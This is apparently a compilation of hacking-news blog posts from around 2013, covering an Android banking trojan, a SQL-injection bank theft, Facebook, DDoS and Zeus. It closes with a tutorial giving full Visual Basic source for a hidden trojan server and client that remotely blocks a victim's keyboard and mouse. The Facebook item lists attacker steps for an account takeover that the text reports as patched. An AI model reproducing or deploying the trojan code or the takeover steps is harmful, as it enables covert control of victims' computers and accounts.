New Android Banking Trojan

A very profitable line for mobile malware developers is Android Banking Trojans, which infect phones and steal passwords and other data when victims log onto their online bank accounts.

One recent trend is Android malware that attacks users in specific countries, such as European Countries, Brazil and India. 

The Antivirus software maker Malwarebytes noticed that a new threat distributed via file sharing sites and alternative markets in the last few months, targets Korean users.

Dubbed as 'Android/Trojan.Bank.Wroba', malware disguises itself as the Google Play Store app and run as a service in the background to monitor events. 

"This enables it to capture incoming SMS, monitor installed apps and communicate with a remote server."

According to the researcher, after installation - malware lookup for existence of targeted Banking applications on the device, remove them and download a malicious version to replace.

"The malicious version will contain the exact Package Name and look very similar to the legitimate app, but contains malicious code with no banking functionality."

The attackers aim to obtain login credentials giving them access to the victim’s bank account and that second installed fake Banking application will capture the banking information and other useful data to generate revenue for them.

Android wouldn't be the only mobile operating system at risk from such automated exploits. Recently launched Firefox Mobile OS also have its first mobile Malware surfaced a few days back.

Hacker stole $100,000

In 2013 we have seen a dramatic increase in the number of hack attacks attempted against banks, 

credit unions and utility companies using various techniques including DDoS attack, SQL injection, DNS Hijacking and Zero-Day Flaws.

SQL Injection is one of the most common security vulnerabilities on the web and is successful only when the web application is not sufficiently secured.

Recently a hacking Group named 'TeamBerserk' claimed on Twitter that, they have stolen $100,000 by leveraging user names and passwords taken from a California ISP Sebastian (Sebastiancorp.com)to access victims' bank accounts.

A video proof was uploaded on the Internet, shows that how hackers used a SQL injection attack against the California ISP Sebastian to access their customers' database includes  e-mail addresses, user names and clear text passwords and then using the same data to steal money from those customers.

Let's see what SQL Injection is and how serious an attack like this actually can be.

SQL Injection is a type of web application vulnerability in which the attacker adds Structured Query Language (SQL) code to web inputs to gain access to an organization's resources. Using this technique, hackers can determine the structure and location of key databases and can download the database or compromise the database server.

Hackers took just 15 minutes to hack into the website using SQLmap (Automated SQL Injection Tool) -- stole customers' database and then immediately accesses the victim's Gmail account, linked PayPal accounts and Bank accounts also.

It's so hard to remember multiple passwords, some people just use the same one over and over. Is your Facebook password the same as your Twitter password? How about the password for your bank's website?

Now the hack explains that this us why it's extremely dangerous to use the same password on more than one Web site. In the POC video, hacker randomly chooses one Sebastian username and his relative password against Paypal, Gmail and even Citibank account logins and seriously that actually worked, because the victim is using the same passwords for all websites.

Now that you've control of the situation, don't let this happen again! If you have a bank account, a few credit cards, and several other important sensitive accounts, conduct a thorough security audit on them. Be sure that you know when you last logged in. Be sure to keep using different and Strong passwords for each website.

Hacking Facebook Account with just a text message

Can you ever imagine that a single text message is enough to hack any Facebook account without user interaction or without using any other malicious stuff like Trojans, phishing, keylogger etc. ?

Today we are going to explain you that how a UK based Security Researcher, "fin1te" is able to hack any Facebook account within a minute by doing one SMS.

Because 90% of us are Facebook user too, so we know that there is an option of linking your mobile number with your account, which allows you to receive Facebook account updates via SMS directly to your mobile and also you can login into your account using that linked number rather than your email address or username

According to hacker, the loophole was in phone number linking process, or in technical terms, at file /ajax/settings/mobile/confirm_phone.php

This particular webpage works in background when user submit his phone number and verification code, sent by Facebook to mobile. That submission form having two main parameters, one for verification code, and second is profile_id, which is the account to link the number to.

As attacker, follow these steps to execute hack: 

1. Change value of profile_id to the Victim's profile_id value by tampering the parameters.
2. Send the letter F to 32665, which is Facebook’s SMS shortcode in the UK. You will receive an 8 character verification code back.
   
3. Enter that code in the box or as confirmation_code parameter value and Submit the form.

Facebook will accept that confirmation code and attacker's mobile number will be linked to victim's Facebook profile.

In next step hacker just need to go to Forgot password option and initiate the password reset request against of victim's account.

Attacker now can get password recovery code to his own mobile number which is linked to victim's account using above steps. Enter the code and Reset the password!

Facebook no longer accepting the profile_id parameter from the user end after receiving the bug report from the hacker.

In return, Facebook paying $20,000 to fin1te as Bug Bounty

World's 3rd Largest Chinese Bitcoin exchange

World's 3rd Largest Chinese Bitcoin exchange hit by 100Gbps DDoS attack

In March of this year, we saw the first ever 300 Gigabit DDoS attack, which was possible due to a DNS Reflection Amplification attack against Spamhaus.

On 24 September World's 3rd Largest Bitcoin exchange BTC China, a platform where both Bitcoin and Chinese yuan are traded faced massive DDoS attack for continued nine hours, where no amplification techniques were used.

Incapsula, Cloud-based security service provider helped the Chinese Bitcoin trader to protect them from such massive denial-of-service attack and successfully mitigated the threats.

Incapsula tweeted a graph of DDoS attack last month as shown, "Yesterday we prevented a ~100Gbps DDoS. The attack's load was distributed across our 350Gbps network."

Specialist at Incapsula shared the details of the attack with TheRegister, explained "The attack against BTC China took the form of a SYN flood rather than the DNS amplification-style attack", "The attacker balanced the assault between small, high frequency SYN packets, and large, low-frequency SYN packets."

The DNS Reflection Denial of Service (DrDoS) technique exploits security weaknesses in the Domain Name System (DNS) Internet protocol, which typically have high bandwidth connections to the Internet.

But to perform such huge 100Gbps DDoS attack without DNS Reflection, it must be a network of many compromised servers with ultra high speed bandwidth. "This amount of fire power isn't cheap, or readily available, signifying a big step up in resources pulled together to launch this type of attack," according to Incapsula.

But when Incapsula came into the scene to defend BTC China, the assault was minimized safe level, "The attackers either ran out of resources or money. It's also possible they gave up after they realised they were not making headway." Incapsula co-founder Marc Gaffan said.

Even from today, China’s largest search engine Baidu has become the first service of its kind to accept payments in the Bitcoin for one of their DDoS protection services.

Zeus still king of the botnets

Years after its release into the public space, the Zeus malware remains the most popular botnet family on the web.

Researchers with McAfee found that the financially-oriented malware was by far the largest botnet on the web, claiming some 57 per cent of botnet infections the company logged thus far in 2013. According to McAfee, Zeus and its variants account for some 57.9 percent of all botnet infections. No other botnet on the list logged more than a nine percent share.

Following its first major outbreaks in 2009, the Zeus malware has long been a thorn in the side of the cybersecurity community.

Renowned for its ability to operate without tipping off users, Zeus infections reside locally on the victim's PC and inject code directly into browser before a page is displayed. This allows Zeus variants to add data input fields or redirect transmissions from an otherwise legitimate website.

According to McAfee researcher Neeraj Thakar, the polymorphic nature of Zeus, which allows the malware to constantly change its own code, makes detecting the malware's signature all but impossible in the wild.

"Bot masters have become so advanced and organized that they can churn out thousands of undetectable and unique malware binaries each day," Thakar wrote.

"That coupled with the ability to rapidly change the control-server hosting infrastructure allows them to stay active longer without being taken down."

The spread of Zeus continues despite efforts by security vendors to remove the various botnets built on the platform. Microsoft recently sued to men in the UK over their involvement in Zeus botnets.

Still, McAfee estimates that as many as 37 per cent of the 8.5 million malware payloads it has analysed this year are linked to known botnets, largely variants on Zeus.

Hacking Joomla with Exploit Video

Hacking Joomla with Exploit

Make a simple Trojan in VB

Make a simple Trojan in VB

Visual Basic is an easy programming language.So easy that most of advanced programmers don't even compare it to behemoths like C/Pascal/C++/PERL etc.But it seriously packs punch due to its ease in programming and predefined procedures.Earlier wrote on how to lock keyboard and mouse using VB. This time I will be discussing on how to write a simple trojan in VB .Writing a Trojan is a lot easier than most people think. All it really involves is two simple applications both with fewer than 100 lines of code. The first application is the client or the program that one user knows about. The second is the server or the actual “trojan” part. I will now go through what you need for both and some sample code. 
Server
The server is the Trojan part of the program. You usually will want this to be as hidden as possible so the average user can’t find it. To do this you start by using

Private Sub Form_Load()
     Me.Visible = False
End Sub

This little bit of code makes the program invisible to the naked eye. Now we all know that the task manager is a little bit peskier. So to get our application hidden from that a little better we make our code look like this.

Private Sub Form_Load()
     Me.Visible = False
     App.TaskVisible = False
End Sub

So now, we have a program that is virtually invisible to the average user, and it only took four lines of code. Now all of you are thinking that this tutorial sucks right about now so lets make it a lot better by adding functions to our Trojan!
The first thing we want to do is make it be able to listen for connections when it loads. So in order to do this we need to add a Winsock Control. I named my control win but you can name yours what ever.
Now to make it listen on port 2945 when the Trojan starts up we make our code look like this.

Private Sub Form_Load()
     Me.Visible = False
     App.TaskVisible = False
     win.LocalPort = 2945
     win.RemotePort = 455
     win.Listen
End Sub

This code will set the local open port to 2945 and the port it sends it to is 455. So now, we have a program that listens but still doesn’t do anything neat. Lets make it block the input of the user completely when we tell it to!
To do this little devious thing we need to add a module with the following code

Public Declare Function BlockInput Lib "user32" (ByVal fBlock As Long) As Long

Then we add this code to our main form:

Private Sub win_ConnectionRequest(ByVal requestID As Long)
     win.Close
     win.Accept requestID
End Sub
Private Sub win_DataArrival(ByVal bytesTotal As Long)
    win.GetData GotDat
    DoActions (GotDat)
End Sub

The code in the module is called a windows API. It uses a dll file to do tasks that we want. Now this code still won’t block the users input but we are very close. We now need to program the DoActions function that we called on our main form. In case you were wondering the code that we added to the form does two different things. The first sub makes it so all connection requests are automatically accepted. The second sub makes it so all data is automatically accepted and it then passes all of the data to the function DoActions which we are about to code.
For the DoActions code, we want to make a public function in the module. So add this code to the module and we are about done with the server of the Trojan!

Public Function DoActions(x As String)
     Dim Action
     Select Case x
             Case "block"
             Action = BlockInput(True)
     End Select
End Function

Ok now we have a program that when the data “block” is sent to it on port 2945 it will block the users input. I made a Select Case statement so it is easy to modify this code to your own needs later on. I recommend adding a unblock feature of your own. To do that just call the BlockInput function with the argument False instead of true.
Main Form

Private Sub Form_Load()
     Me.Visible = False
     App.TaskVisible = False
     win.LocalPort = 2945
     win.RemotePort = 455
     win.Listen
End Sub
Private Sub win_ConnectionRequest(ByVal requestID As Long) 
     win.Close
     win.Accept requestID
End Sub
Private Sub win_DataArrival(ByVal bytesTotal As Long)
     win.GetData GotDat
     DoActions (GotDat)
End Sub

Remember to add your winsock control and name it to win if you use this code.
That’s all there is to the server side or Trojan part of it. Now on to the Client.
Client
The client will be what you will interact with. You will use it to connect to the remote server (trojan) and send it commands. Since we made a server that accepts the command of “block” lets make a client that sends the command “block”.
Make a form and add a Winsock Control, a text box, and three buttons. The Text box should be named txtIP if you want it to work with this code. In addition, your buttons should be named cmdConnect, cmdBlockInput, and cmdDisconnect. Now lets look at the code we would use to make our Client.

Private Sub cmdConnect_Click()
     IpAddy = txtIp.Text
     Win.Close
     Win.RemotePort = 2945
     Win.RemoteHost = IpAddy
     Win.LocalPort = 9999
     Win.Connect
     cmdConnect.Enabled = False
End Sub
Private Sub cmdDisconnect_Click()
     Win.Close
     cmdConnect.Enabled = True
End Sub
Private Sub cmdBlockInput_Click()
     Win.SendData "block"
End Sub

That is the code for the client. All it does is gets the Ip Adress from txtIp and connects to it on remote port 2945. Then when connected you can send the “block” data to block off their input.
This completes the tutorial to make a simple Trojan in VB